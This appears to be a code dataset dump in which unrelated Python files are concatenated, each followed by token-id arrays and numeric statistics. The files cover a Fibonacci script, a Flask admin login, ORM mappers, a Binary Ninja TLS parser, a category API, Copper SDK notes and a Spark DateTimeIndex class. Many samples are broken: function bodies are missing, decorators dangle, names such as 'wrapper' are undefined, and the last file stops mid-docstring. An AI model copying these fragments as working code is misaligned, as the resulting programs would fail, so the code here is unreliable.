n = int(input('---- Sequência Fibonacci ----\nInsira a quantidade de termos: ')) t1 = 0 t2 = 1 print('{} -> {}'.format(t1, t2), end='') contador = 3 while contador <= n+1: t3 = t1 + t2 print(' -> {}'.format(t3) if contador != n+1 else ' -> Fim', end='') t1 = t2 t2 = t3 contador += 1
[ 77, 796, 493, 7, 15414, 10786, 650, 24604, 25792, 10782, 544, 41566, 261, 44456, 13498, 59, 77, 20376, 8704, 257, 5554, 312, 671, 390, 3381, 418, 25, 705, 4008, 198, 198, 83, 16, 796, 657, 198, 83, 17, 796, 352, 198, 4798, 10786, 90, 92, 4613, 23884, 4458, 18982, 7, 83, 16, 11, 256, 17, 828, 886, 28, 7061, 8, 198, 198, 3642, 7079, 796, 513, 198, 4514, 542, 7079, 19841, 299, 10, 16, 25, 198, 220, 256, 18, 796, 256, 16, 1343, 256, 17, 198, 220, 3601, 10786, 4613, 23884, 4458, 18982, 7, 83, 18, 8, 611, 542, 7079, 14512, 299, 10, 16, 2073, 705, 4613, 376, 320, 3256, 886, 28, 7061, 8, 198, 220, 256, 16, 796, 256, 17, 198, 220, 256, 17, 796, 256, 18, 198, 220, 542, 7079, 15853, 352, 198 ]
2.192593
135
import json from flask import Blueprint, flash, Markup, redirect, render_template, request,\ session from libs import admin_authentication from libs.admin_authentication import authenticate_admin_login,\ authenticate_admin_study_access, get_admins_allowed_studies, get_admins_allowed_studies_as_query_set,\ admin_is_system_admin from libs.security import check_password_requirements from database.models import Researcher, Study admin_pages = Blueprint('admin_pages', __name__) # TODO: Document. @admin_pages.route('/choose_study', methods=['GET']) @authenticate_admin_login @admin_pages.route('/view_study/<string:study_id>', methods=['GET']) @authenticate_admin_study_access @admin_pages.route('/data-pipeline/<string:study_id>', methods=['GET']) @authenticate_admin_study_access """########################## Login/Logoff ##################################""" @admin_pages.route('/') @admin_pages.route('/admin') @admin_pages.route("/logout") @admin_pages.route("/validate_login", methods=["GET", "POST"]) def login(): """ Authenticates administrator login, redirects to login page if authentication fails. """ if request.method == 'POST': username = request.values["username"] password = request.values["password"] if Researcher.check_password(username, password): admin_authentication.log_in_admin(username) return redirect("/choose_study") else: flash("Incorrect username & password combination; try again.", 'danger') return redirect("/") @admin_pages.route('/manage_credentials') @authenticate_admin_login @admin_pages.route('/reset_admin_password', methods=['POST']) @authenticate_admin_login @admin_pages.route('/reset_download_api_credentials', methods=['POST']) @authenticate_admin_login
[ 11748, 33918, 198, 198, 6738, 42903, 1330, 39932, 11, 7644, 11, 2940, 929, 11, 18941, 11, 8543, 62, 28243, 11, 2581, 11, 59, 198, 220, 220, 220, 6246, 198, 198, 6738, 9195, 82, 1330, 13169, 62, 41299, 3299, 198, 6738, 9195, 82, 13, 28482, 62, 41299, 3299, 1330, 8323, 5344, 62, 28482, 62, 38235, 11, 59, 198, 220, 220, 220, 8323, 5344, 62, 28482, 62, 44517, 62, 15526, 11, 651, 62, 324, 42951, 62, 40845, 62, 19149, 444, 11, 651, 62, 324, 42951, 62, 40845, 62, 19149, 444, 62, 292, 62, 22766, 62, 2617, 11, 59, 198, 220, 220, 220, 13169, 62, 271, 62, 10057, 62, 28482, 198, 6738, 9195, 82, 13, 12961, 1330, 2198, 62, 28712, 62, 8897, 18883, 198, 198, 6738, 6831, 13, 27530, 1330, 1874, 50194, 11, 12481, 628, 198, 28482, 62, 31126, 796, 39932, 10786, 28482, 62, 31126, 3256, 11593, 3672, 834, 8, 198, 198, 2, 16926, 46, 25, 16854, 13, 628, 198, 31, 28482, 62, 31126, 13, 38629, 10786, 14, 6679, 577, 62, 44517, 3256, 5050, 28, 17816, 18851, 6, 12962, 198, 31, 41299, 5344, 62, 28482, 62, 38235, 628, 198, 31, 28482, 62, 31126, 13, 38629, 10786, 14, 1177, 62, 44517, 14, 27, 8841, 25, 44517, 62, 312, 29, 3256, 5050, 28, 17816, 18851, 6, 12962, 198, 31, 41299, 5344, 62, 28482, 62, 44517, 62, 15526, 628, 198, 31, 28482, 62, 31126, 13, 38629, 10786, 14, 7890, 12, 79, 541, 4470, 14, 27, 8841, 25, 44517, 62, 312, 29, 3256, 5050, 28, 17816, 18851, 6, 12962, 198, 31, 41299, 5344, 62, 28482, 62, 44517, 62, 15526, 628, 198, 37811, 14468, 7804, 2235, 23093, 14, 11187, 2364, 1303, 29113, 2, 37811, 628, 198, 31, 28482, 62, 31126, 13, 38629, 10786, 14, 11537, 198, 31, 28482, 62, 31126, 13, 38629, 10786, 14, 28482, 11537, 628, 198, 31, 28482, 62, 31126, 13, 38629, 7203, 14, 6404, 448, 4943, 628, 198, 31, 28482, 62, 31126, 13, 38629, 7203, 14, 12102, 378, 62, 38235, 1600, 5050, 28, 14692, 18851, 1600, 366, 32782, 8973, 8, 198, 4299, 17594, 33529, 198, 220, 220, 220, 37227, 31885, 16856, 18382, 17594, 11, 18941, 82, 284, 17594, 2443, 611, 18239, 10143, 13, 37227, 198, 220, 220, 220, 611, 2581, 13, 24396, 6624, 705, 32782, 10354, 198, 220, 220, 220, 220, 220, 220, 220, 20579, 796, 2581, 13, 27160, 14692, 29460, 8973, 198, 220, 220, 220, 220, 220, 220, 220, 9206, 796, 2581, 13, 27160, 14692, 28712, 8973, 198, 220, 220, 220, 220, 220, 220, 220, 611, 1874, 50194, 13, 9122, 62, 28712, 7, 29460, 11, 9206, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 13169, 62, 41299, 3299, 13, 6404, 62, 259, 62, 28482, 7, 29460, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 18941, 7203, 14, 6679, 577, 62, 44517, 4943, 198, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 7644, 7203, 818, 30283, 20579, 1222, 9206, 6087, 26, 1949, 757, 33283, 705, 38537, 11537, 628, 220, 220, 220, 1441, 18941, 7203, 14, 4943, 628, 198, 31, 28482, 62, 31126, 13, 38629, 10786, 14, 805, 496, 62, 66, 445, 14817, 11537, 198, 31, 41299, 5344, 62, 28482, 62, 38235, 628, 198, 31, 28482, 62, 31126, 13, 38629, 10786, 14, 42503, 62, 28482, 62, 28712, 3256, 5050, 28, 17816, 32782, 6, 12962, 198, 31, 41299, 5344, 62, 28482, 62, 38235, 628, 198, 31, 28482, 62, 31126, 13, 38629, 10786, 14, 42503, 62, 15002, 62, 15042, 62, 66, 445, 14817, 3256, 5050, 28, 17816, 32782, 6, 12962, 198, 31, 41299, 5344, 62, 28482, 62, 38235, 198 ]
3.006612
605
import cv2
[ 11748, 269, 85, 17 ]
2.5
4
""" This file is part of the TheLMA (THe Laboratory Management Application) project. See LICENSE.txt for licensing, CONTRIBUTORS.txt for contributor information. Stock sample creation ISO mapper. """ from sqlalchemy.orm import relationship from everest.repositories.rdb.utils import mapper from thelma.entities.iso import ISO_TYPES from thelma.entities.iso import IsoSectorPreparationPlate from thelma.entities.iso import StockSampleCreationIso __docformat__ = "reStructuredText en" __all__ = ['create_mapper'] def create_mapper(iso_mapper, stock_sample_creation_iso_tbl): "Mapper factory." m = mapper(StockSampleCreationIso, stock_sample_creation_iso_tbl, inherits=iso_mapper, properties=dict( iso_sector_preparation_plates=relationship( IsoSectorPreparationPlate, back_populates='iso', cascade='all,delete,delete-orphan')), polymorphic_identity=ISO_TYPES.STOCK_SAMPLE_GENERATION) return m
[ 37811, 198, 1212, 2393, 318, 636, 286, 262, 383, 43, 5673, 357, 51, 1544, 18643, 8549, 15678, 8, 1628, 13, 198, 6214, 38559, 24290, 13, 14116, 329, 15665, 11, 27342, 9865, 3843, 20673, 13, 14116, 329, 18920, 1321, 13, 198, 198, 26207, 6291, 6282, 19694, 285, 11463, 13, 198, 37811, 198, 198, 6738, 44161, 282, 26599, 13, 579, 1330, 2776, 198, 198, 6738, 28001, 2118, 13, 260, 1930, 270, 1749, 13, 4372, 65, 13, 26791, 1330, 285, 11463, 198, 6738, 262, 75, 2611, 13, 298, 871, 13, 26786, 1330, 19694, 62, 9936, 47, 1546, 198, 6738, 262, 75, 2611, 13, 298, 871, 13, 26786, 1330, 314, 568, 50, 9250, 6719, 1845, 341, 3646, 378, 198, 6738, 262, 75, 2611, 13, 298, 871, 13, 26786, 1330, 10500, 36674, 12443, 341, 40, 568, 628, 198, 834, 15390, 18982, 834, 796, 366, 260, 44909, 1522, 8206, 551, 1, 198, 834, 439, 834, 796, 37250, 17953, 62, 76, 11463, 20520, 628, 198, 4299, 2251, 62, 76, 11463, 7, 26786, 62, 76, 11463, 11, 4283, 62, 39873, 62, 38793, 62, 26786, 62, 83, 2436, 2599, 198, 220, 220, 220, 366, 44, 11463, 8860, 526, 198, 220, 220, 220, 285, 796, 285, 11463, 7, 26207, 36674, 12443, 341, 40, 568, 11, 4283, 62, 39873, 62, 38793, 62, 26786, 62, 83, 2436, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 10639, 896, 28, 26786, 62, 76, 11463, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 6608, 28, 11600, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 47279, 62, 34914, 62, 3866, 1845, 341, 62, 17041, 28, 39468, 1056, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 314, 568, 50, 9250, 6719, 1845, 341, 3646, 378, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 736, 62, 12924, 15968, 11639, 26786, 3256, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 44847, 11639, 439, 11, 33678, 11, 33678, 12, 13425, 272, 11537, 828, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 34196, 291, 62, 738, 414, 28, 40734, 62, 9936, 47, 1546, 13, 2257, 11290, 62, 49302, 16437, 62, 35353, 1137, 6234, 8, 198, 220, 220, 220, 1441, 285, 198 ]
2.401376
436
from plynx.db.service_state import get_master_state from plynx.utils.common import JSONEncoder from plynx.web.common import app, requires_auth, make_fail_response, handle_errors @app.route('/plynx/api/v0/master_state', methods=['GET']) @handle_errors @requires_auth
[ 6738, 279, 6213, 87, 13, 9945, 13, 15271, 62, 5219, 1330, 651, 62, 9866, 62, 5219, 198, 6738, 279, 6213, 87, 13, 26791, 13, 11321, 1330, 19449, 27195, 12342, 198, 6738, 279, 6213, 87, 13, 12384, 13, 11321, 1330, 598, 11, 4433, 62, 18439, 11, 787, 62, 32165, 62, 26209, 11, 5412, 62, 48277, 628, 198, 31, 1324, 13, 38629, 10786, 14, 2145, 77, 87, 14, 15042, 14, 85, 15, 14, 9866, 62, 5219, 3256, 5050, 28, 17816, 18851, 6, 12962, 198, 31, 28144, 62, 48277, 198, 31, 47911, 62, 18439, 198 ]
2.913043
92
from binaryninja import Symbol, Type, log from binaryninja.enums import SymbolType from .utils import BinjaStruct, read_pe_header, check_address IMAGE_TLS_DIRECTORY32_t = BinjaStruct('<IIIIII', names = ('StartAddressOfRawData', 'EndAddressOfRawData', 'AddressOfIndex', 'AddressOfCallBacks', 'SizeOfZeroFill', 'Characteristics')) IMAGE_TLS_DIRECTORY64_t = BinjaStruct('<QQQQII', names = ('StartAddressOfRawData', 'EndAddressOfRawData', 'AddressOfIndex', 'AddressOfCallBacks', 'SizeOfZeroFill', 'Characteristics'))
[ 6738, 13934, 35073, 6592, 1330, 38357, 11, 5994, 11, 2604, 198, 6738, 13934, 35073, 6592, 13, 268, 5700, 1330, 38357, 6030, 198, 198, 6738, 764, 26791, 1330, 20828, 6592, 44909, 11, 1100, 62, 431, 62, 25677, 11, 2198, 62, 21975, 628, 198, 3955, 11879, 62, 51, 6561, 62, 17931, 23988, 15513, 2624, 62, 83, 796, 20828, 6592, 44909, 10786, 27, 3978, 3978, 3978, 3256, 3891, 796, 19203, 10434, 20231, 5189, 27369, 6601, 3256, 705, 12915, 20231, 5189, 27369, 6601, 3256, 705, 20231, 5189, 15732, 3256, 705, 20231, 5189, 14134, 33, 4595, 3256, 705, 10699, 5189, 28667, 33762, 3256, 705, 27275, 3969, 6, 4008, 198, 3955, 11879, 62, 51, 6561, 62, 17931, 23988, 15513, 2414, 62, 83, 796, 20828, 6592, 44909, 10786, 27, 48, 48, 48, 48, 3978, 3256, 3891, 796, 19203, 10434, 20231, 5189, 27369, 6601, 3256, 705, 12915, 20231, 5189, 27369, 6601, 3256, 705, 20231, 5189, 15732, 3256, 705, 20231, 5189, 14134, 33, 4595, 3256, 705, 10699, 5189, 28667, 33762, 3256, 705, 27275, 3969, 6, 4008, 628 ]
3.077381
168
""" Author: Frederik Muller, [email protected] Author: Matej Vido, [email protected] Date: 04/2017 """ import bcrypt from flask import request from bson import json_util, ObjectId import pymongo from slugify import slugify from api import auth, db from api.module import Module from api.models.models import Category, CategoryException from api.role import Role category = Module('categories', __name__, url_prefix='/categories', no_version=True) @auth.required(Role.admin) @auth.required(Role.admin) def remove_category(category_id): """ Remove the category """ category = Category.query.get_or_404(category_id) try: db.db.session.delete(category) db.db.session.commit() except Exception as e: db.db.session.rollback() print(e) raise CategoryException("Could not remove category from database") tmp = category.to_dict() return(json_util.dumps(tmp)) @auth.required(Role.admin) category.add_url_rule('', view_func=get_categories, methods=['GET']) category.add_url_rule('', view_func=add_category, methods=['POST']) category.add_url_rule('/<string:category_id>', view_func=get_category, methods=['GET']) category.add_url_rule('/<string:category_id>', view_func=edit_category, methods=['PUT']) category.add_url_rule('/<string:category_id>', view_func=remove_category, methods=['DELETE'])
[ 37811, 198, 13838, 25, 18669, 1134, 47508, 11, 2124, 76, 377, 293, 1238, 31, 19149, 13, 11147, 13, 85, 315, 1671, 13, 26691, 198, 13838, 25, 24787, 73, 569, 17305, 11, 2124, 16921, 296, 405, 31, 19149, 13, 11147, 13, 85, 315, 1671, 13, 26691, 198, 10430, 25, 220, 220, 8702, 14, 5539, 198, 37811, 198, 198, 11748, 275, 29609, 198, 6738, 42903, 1330, 2581, 198, 6738, 275, 1559, 1330, 33918, 62, 22602, 11, 9515, 7390, 198, 11748, 279, 4948, 25162, 198, 6738, 31065, 1958, 1330, 31065, 1958, 198, 198, 6738, 40391, 1330, 6284, 11, 20613, 198, 6738, 40391, 13, 21412, 1330, 19937, 198, 6738, 40391, 13, 27530, 13, 27530, 1330, 21743, 11, 21743, 16922, 198, 6738, 40391, 13, 18090, 1330, 20934, 198, 198, 22872, 796, 19937, 10786, 66, 26129, 3256, 11593, 3672, 834, 11, 19016, 62, 40290, 11639, 14, 66, 26129, 3256, 645, 62, 9641, 28, 17821, 8, 198, 198, 31, 18439, 13, 35827, 7, 47445, 13, 28482, 8, 198, 198, 31, 18439, 13, 35827, 7, 47445, 13, 28482, 8, 198, 4299, 4781, 62, 22872, 7, 22872, 62, 312, 2599, 198, 197, 37811, 198, 197, 27914, 262, 6536, 198, 197, 37811, 628, 197, 22872, 796, 21743, 13, 22766, 13, 1136, 62, 273, 62, 26429, 7, 22872, 62, 312, 8, 628, 197, 28311, 25, 198, 197, 197, 9945, 13, 9945, 13, 29891, 13, 33678, 7, 22872, 8, 198, 197, 197, 9945, 13, 9945, 13, 29891, 13, 41509, 3419, 198, 197, 16341, 35528, 355, 304, 25, 198, 197, 197, 9945, 13, 9945, 13, 29891, 13, 2487, 1891, 3419, 198, 197, 197, 4798, 7, 68, 8, 198, 197, 197, 40225, 21743, 16922, 7203, 23722, 407, 4781, 6536, 422, 6831, 4943, 628, 197, 22065, 796, 6536, 13, 1462, 62, 11600, 3419, 628, 197, 7783, 7, 17752, 62, 22602, 13, 67, 8142, 7, 22065, 4008, 198, 198, 31, 18439, 13, 35827, 7, 47445, 13, 28482, 8, 198, 198, 22872, 13, 2860, 62, 6371, 62, 25135, 10786, 3256, 1570, 62, 20786, 28, 1136, 62, 66, 26129, 11, 5050, 28, 17816, 18851, 6, 12962, 198, 22872, 13, 2860, 62, 6371, 62, 25135, 10786, 3256, 1570, 62, 20786, 28, 2860, 62, 22872, 11, 5050, 28, 17816, 32782, 6, 12962, 198, 22872, 13, 2860, 62, 6371, 62, 25135, 10786, 14, 27, 8841, 25, 22872, 62, 312, 29, 3256, 1570, 62, 20786, 28, 1136, 62, 22872, 11, 5050, 28, 17816, 18851, 6, 12962, 198, 22872, 13, 2860, 62, 6371, 62, 25135, 10786, 14, 27, 8841, 25, 22872, 62, 312, 29, 3256, 1570, 62, 20786, 28, 19312, 62, 22872, 11, 5050, 28, 17816, 30076, 6, 12962, 198, 22872, 13, 2860, 62, 6371, 62, 25135, 10786, 14, 27, 8841, 25, 22872, 62, 312, 29, 3256, 1570, 62, 20786, 28, 28956, 62, 22872, 11, 5050, 28, 17816, 7206, 2538, 9328, 6, 12962, 198 ]
2.893709
461
#!/usr/bin/python3 """ Amenity module """ from models.base_model import BaseModel class Amenity(BaseModel): """ Amenity class implementation """ name = "" def __init__(self, *args, **kwargs): """ Initialize in parent class """ super().__init__(self, *args, **kwargs)
[ 2, 48443, 14629, 14, 8800, 14, 29412, 18, 201, 198, 37811, 34717, 414, 8265, 37227, 201, 198, 201, 198, 6738, 4981, 13, 8692, 62, 19849, 1330, 7308, 17633, 201, 198, 201, 198, 201, 198, 4871, 34717, 414, 7, 14881, 17633, 2599, 201, 198, 220, 220, 220, 37227, 34717, 414, 1398, 7822, 37227, 201, 198, 201, 198, 220, 220, 220, 1438, 796, 13538, 201, 198, 201, 198, 220, 220, 220, 825, 11593, 15003, 834, 7, 944, 11, 1635, 22046, 11, 12429, 46265, 22046, 2599, 201, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 20768, 1096, 287, 2560, 1398, 37227, 201, 198, 220, 220, 220, 220, 220, 220, 220, 2208, 22446, 834, 15003, 834, 7, 944, 11, 1635, 22046, 11, 12429, 46265, 22046, 8, 201, 198 ]
2.512
125
from copper_sdk.notes import NoteTarget import names_generator import json import shared_procs def create_task_note(copper_client, task_id, user_id): """Create a note for a Task Attributes: copper_client (copper_sdk.copper): The CopperSDK client. task_id (str): The Id for the Task. Returns: The new note. """ notes = copper_client.notes() target = NoteTarget.Task name = names_generator.generate_name(style="capital") content = f"{name} greets you from Python" return notes.push(target, task_id, content, user_id) def get_task_notes(copper_client, task_id): """Get notes of a Task. Attributes: copper_client (copper_sdk.copper): The CopperSDK client. task_id (str): The Id for the Task. Returns: All notes for a Task. """ notes = copper_client.notes() target = NoteTarget.Task return notes.get(target, task_id) def create_task_note_old(copper_client, task_id): """Create a note for a Task (old method) Attributes: copper_client (copper_sdk.copper): The CopperSDK client. task_id (str): The Id for the Task. Returns: The new note. """ return copper_client.tasks().pull_notes(task_id) def get_task_notes_old(copper_client, task_id): """Get notes of a Task (old method). Attributes: copper_client (copper_sdk.copper): The CopperSDK client. task_id (str): The Id for the Task. Returns: All notes for a Task. """ name = names_generator.generate_name(style="capital") content = f"{name} greets you from Python" return copper_client.tasks().push_note(task_id, content) def run_old(copper_client, config): """Old example on upload and download task notes. This uses the notes fns of `copper_sdk.Task`. """ print("Old example on pushing Task Notes") task_id = config["TASK_ID"] print("Creating note for Task Id", task_id) new_task_note = create_task_note_old(copper_client, task_id) print("Note:", json.dumps(new_task_note)) shared_procs.wait() print("Getting all notes for Task Id", task_id) task_notes = get_task_notes_old(copper_client, task_id) print(json.dumps(task_notes))
[ 6738, 15317, 62, 21282, 74, 13, 17815, 1330, 5740, 21745, 198, 11748, 3891, 62, 8612, 1352, 198, 11748, 33918, 198, 11748, 4888, 62, 1676, 6359, 198, 198, 4299, 2251, 62, 35943, 62, 11295, 7, 1073, 2848, 62, 16366, 11, 4876, 62, 312, 11, 2836, 62, 312, 2599, 198, 220, 220, 220, 37227, 16447, 257, 3465, 329, 257, 15941, 198, 220, 220, 220, 220, 198, 220, 220, 220, 49213, 25, 198, 220, 220, 220, 220, 220, 220, 220, 15317, 62, 16366, 357, 1073, 2848, 62, 21282, 74, 13, 1073, 2848, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 383, 27157, 10305, 42, 5456, 13, 198, 220, 220, 220, 220, 220, 220, 220, 4876, 62, 312, 357, 2536, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 383, 5121, 329, 262, 15941, 13, 628, 220, 220, 220, 16409, 25, 198, 220, 220, 220, 220, 220, 220, 220, 383, 649, 3465, 13, 628, 220, 220, 220, 37227, 628, 220, 220, 220, 4710, 796, 15317, 62, 16366, 13, 17815, 3419, 198, 220, 220, 220, 2496, 796, 5740, 21745, 13, 25714, 198, 220, 220, 220, 1438, 796, 3891, 62, 8612, 1352, 13, 8612, 378, 62, 3672, 7, 7635, 2625, 27544, 4943, 198, 220, 220, 220, 2695, 796, 277, 1, 90, 3672, 92, 45204, 345, 422, 11361, 1, 198, 220, 220, 220, 1441, 4710, 13, 14689, 7, 16793, 11, 4876, 62, 312, 11, 2695, 11, 2836, 62, 312, 8, 198, 198, 4299, 651, 62, 35943, 62, 17815, 7, 1073, 2848, 62, 16366, 11, 4876, 62, 312, 2599, 198, 220, 220, 220, 37227, 3855, 4710, 286, 257, 15941, 13, 628, 220, 220, 220, 49213, 25, 198, 220, 220, 220, 220, 220, 220, 220, 15317, 62, 16366, 357, 1073, 2848, 62, 21282, 74, 13, 1073, 2848, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 383, 27157, 10305, 42, 5456, 13, 198, 220, 220, 220, 220, 220, 220, 220, 4876, 62, 312, 357, 2536, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 383, 5121, 329, 262, 15941, 13, 628, 220, 220, 220, 16409, 25, 198, 220, 220, 220, 220, 220, 220, 220, 1439, 4710, 329, 257, 15941, 13, 628, 220, 220, 220, 37227, 628, 220, 220, 220, 4710, 796, 15317, 62, 16366, 13, 17815, 3419, 198, 220, 220, 220, 2496, 796, 5740, 21745, 13, 25714, 198, 220, 220, 220, 1441, 4710, 13, 1136, 7, 16793, 11, 4876, 62, 312, 8, 628, 198, 198, 4299, 2251, 62, 35943, 62, 11295, 62, 727, 7, 1073, 2848, 62, 16366, 11, 4876, 62, 312, 2599, 198, 220, 220, 220, 37227, 16447, 257, 3465, 329, 257, 15941, 357, 727, 2446, 8, 198, 220, 220, 220, 220, 198, 220, 220, 220, 49213, 25, 198, 220, 220, 220, 220, 220, 220, 220, 15317, 62, 16366, 357, 1073, 2848, 62, 21282, 74, 13, 1073, 2848, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 383, 27157, 10305, 42, 5456, 13, 198, 220, 220, 220, 220, 220, 220, 220, 4876, 62, 312, 357, 2536, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 383, 5121, 329, 262, 15941, 13, 628, 220, 220, 220, 16409, 25, 198, 220, 220, 220, 220, 220, 220, 220, 383, 649, 3465, 13, 628, 220, 220, 220, 37227, 628, 220, 220, 220, 1441, 15317, 62, 16366, 13, 83, 6791, 22446, 31216, 62, 17815, 7, 35943, 62, 312, 8, 198, 198, 4299, 651, 62, 35943, 62, 17815, 62, 727, 7, 1073, 2848, 62, 16366, 11, 4876, 62, 312, 2599, 198, 220, 220, 220, 37227, 3855, 4710, 286, 257, 15941, 357, 727, 2446, 737, 628, 220, 220, 220, 49213, 25, 198, 220, 220, 220, 220, 220, 220, 220, 15317, 62, 16366, 357, 1073, 2848, 62, 21282, 74, 13, 1073, 2848, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 383, 27157, 10305, 42, 5456, 13, 198, 220, 220, 220, 220, 220, 220, 220, 4876, 62, 312, 357, 2536, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 383, 5121, 329, 262, 15941, 13, 628, 220, 220, 220, 16409, 25, 198, 220, 220, 220, 220, 220, 220, 220, 1439, 4710, 329, 257, 15941, 13, 628, 220, 220, 220, 37227, 198, 220, 220, 220, 1438, 796, 3891, 62, 8612, 1352, 13, 8612, 378, 62, 3672, 7, 7635, 2625, 27544, 4943, 198, 220, 220, 220, 2695, 796, 277, 1, 90, 3672, 92, 45204, 345, 422, 11361, 1, 198, 220, 220, 220, 1441, 15317, 62, 16366, 13, 83, 6791, 22446, 14689, 62, 11295, 7, 35943, 62, 312, 11, 2695, 8, 198, 198, 4299, 1057, 62, 727, 7, 1073, 2848, 62, 16366, 11, 4566, 2599, 198, 220, 220, 220, 37227, 19620, 1672, 319, 9516, 290, 4321, 4876, 4710, 13, 198, 220, 220, 220, 220, 198, 220, 220, 220, 770, 3544, 262, 4710, 277, 5907, 286, 4600, 1073, 2848, 62, 21282, 74, 13, 25714, 44646, 628, 220, 220, 220, 37227, 628, 220, 220, 220, 3601, 7203, 19620, 1672, 319, 7796, 15941, 11822, 4943, 198, 220, 220, 220, 4876, 62, 312, 796, 4566, 14692, 51, 1921, 42, 62, 2389, 8973, 628, 220, 220, 220, 3601, 7203, 32071, 3465, 329, 15941, 5121, 1600, 4876, 62, 312, 8, 198, 220, 220, 220, 649, 62, 35943, 62, 11295, 796, 2251, 62, 35943, 62, 11295, 62, 727, 7, 1073, 2848, 62, 16366, 11, 4876, 62, 312, 8, 198, 220, 220, 220, 3601, 7203, 6425, 25, 1600, 33918, 13, 67, 8142, 7, 3605, 62, 35943, 62, 11295, 4008, 628, 220, 220, 220, 4888, 62, 1676, 6359, 13, 17077, 3419, 628, 220, 220, 220, 3601, 7203, 20570, 477, 4710, 329, 15941, 5121, 1600, 4876, 62, 312, 8, 198, 220, 220, 220, 4876, 62, 17815, 796, 651, 62, 35943, 62, 17815, 62, 727, 7, 1073, 2848, 62, 16366, 11, 4876, 62, 312, 8, 198, 220, 220, 220, 3601, 7, 17752, 13, 67, 8142, 7, 35943, 62, 17815, 4008, 198 ]
2.401423
984
import os.path from .. import generate TEST_PATH = os.path.dirname(__file__)
[ 11748, 28686, 13, 6978, 198, 198, 6738, 11485, 1330, 7716, 628, 198, 51, 6465, 62, 34219, 796, 28686, 13, 6978, 13, 15908, 3672, 7, 834, 7753, 834, 8, 628 ]
2.793103
29
import contextlib import functools import io import pathlib import sys import typing import unittest from nprintml import cli from test.base import mktestdir TEST_ROOT = pathlib.Path(__file__).parent.parent TEST_DATA = TEST_ROOT / 'data' def testdir(func): """Decorator to wrap given function such that a temporary directory is created and destroyed for each invocation. """ @functools.wraps(func) return wrapper
[ 11748, 4732, 8019, 198, 11748, 1257, 310, 10141, 198, 11748, 33245, 198, 11748, 3108, 8019, 198, 11748, 25064, 198, 11748, 19720, 198, 11748, 555, 715, 395, 198, 198, 6738, 299, 4798, 4029, 1330, 537, 72, 198, 198, 6738, 1332, 13, 8692, 1330, 33480, 9288, 15908, 628, 198, 51, 6465, 62, 13252, 2394, 796, 3108, 8019, 13, 15235, 7, 834, 7753, 834, 737, 8000, 13, 8000, 198, 198, 51, 6465, 62, 26947, 796, 43001, 62, 13252, 2394, 1220, 705, 7890, 6, 628, 198, 4299, 1332, 15908, 7, 20786, 2599, 198, 220, 220, 220, 37227, 10707, 273, 1352, 284, 14441, 1813, 2163, 884, 326, 257, 8584, 8619, 198, 220, 220, 220, 318, 2727, 290, 6572, 329, 1123, 43219, 13, 628, 220, 220, 220, 37227, 198, 220, 220, 220, 2488, 12543, 310, 10141, 13, 29988, 862, 7, 20786, 8, 628, 220, 220, 220, 1441, 29908, 628, 198 ]
3.083333
144
from py4j.java_gateway import java_import from .utils import datetime_to_nanos import numpy as np import pandas as pd class DateTimeIndex(object): """ A DateTimeIndex maintains a bi-directional mapping between integers and an ordered collection of date-times. Multiple date-times may correspond to the same integer, implying multiple samples at the same date-time. To avoid confusion between the meaning of "index" as it appears in "DateTimeIndex" and "index" as a location in an array, in the context of this class, we use "location", or "loc", to refer to the latter. """ def __len__(self): """Returns the number of timestamps included in the index.""" return self._jdt_index.size() def _zdt_to_nanos(self, zdt): """Extracts nanoseconds from a ZonedDateTime""" instant = zdt.toInstant() return instant.getNano() + instant.getEpochSecond() * 1000000000 def first(self): """Returns the earliest timestamp in the index, as a Pandas Timestamp.""" return pd.Timestamp(self._zdt_to_nanos(self._jdt_index.first())) def last(self): """Returns the latest timestamp in the index, as a Pandas Timestamp.""" return pd.Timestamp(self._zdt_to_nanos(self._jdt_index.last())) def datetime_at_loc(self, loc): """Returns the timestamp at the given integer location as a Pandas Timestamp.""" return pd.Timestamp(self._zdt_to_nanos(self._jdt_index.dateTimeAtLoc(loc))) def islice(self, start, end): """ Returns a new DateTimeIndex, containing a subslice of the timestamps in this index, as specified by the given integer start and end locations. Parameters ---------- start : int The location of the start of the range, inclusive. end : int The location of the end of the range, exclusive. """ jdt_index = self._jdt_index.islice(start, end) return DateTimeIndex(jdt_index=jdt_index) def to_pandas_index(self): """Returns a pandas.DatetimeIndex representing the same date-times""" # TODO: we can probably speed this up for uniform indices arr = self._jdt_index.toNanosArray() return pd.DatetimeIndex(arr) class DayFrequency(_Frequency): """ A frequency that can be used for a uniform DateTimeIndex, where the period is given in days. """ class HourFrequency(_Frequency): """ A frequency that can be used for a uniform DateTimeIndex, where the period is given in hours. """ class BusinessDayFrequency(object): """ A frequency that can be used for a uniform DateTimeIndex, where the period is given in business days. The first day of the business week is specified where Monday=1, Tuesday=2, and so on. """ def uniform(start, end=None, periods=None, freq=None, sc=None): """ Instantiates a uniform DateTimeIndex. Either end or periods must be specified. Parameters ---------- start : string, long 